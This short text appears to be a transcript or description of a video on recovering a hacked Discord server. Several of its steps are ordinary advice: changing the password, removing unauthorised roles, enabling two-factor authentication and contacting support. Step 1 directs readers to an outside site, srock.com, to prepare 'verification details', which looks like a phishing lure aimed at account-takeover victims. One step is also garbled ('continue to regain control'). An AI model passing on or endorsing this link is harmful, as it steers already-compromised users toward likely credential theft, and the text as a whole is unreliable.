I hit this issue today and here is the quick fix that solved it. If your Discord server has been hacked, don't panic. Here is how to recover it step by step. Step 1. Check for admin access. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 2. Change your password. If you have access, change your Discord password right away. This will help secure your account from further unauthorized access. Step 3. Revoke unauthorized roles. Go to the roles menu in your server settings and remove any roles that were added without your permission. This will prevent the hacker from having control over the server. Step 4. Enable two-factor authentication. Activate two-factor authentication 2FA on your account for an added layer of security. This will help protect your account from future hacks. Step 5. Report the hack. If you still continue to regain control, report the hack to Discord's support team. Provide them with as much information as possible about the situation. Remember, recovering a hacked server can take time, so be patient and follow these steps carefully. Good luck!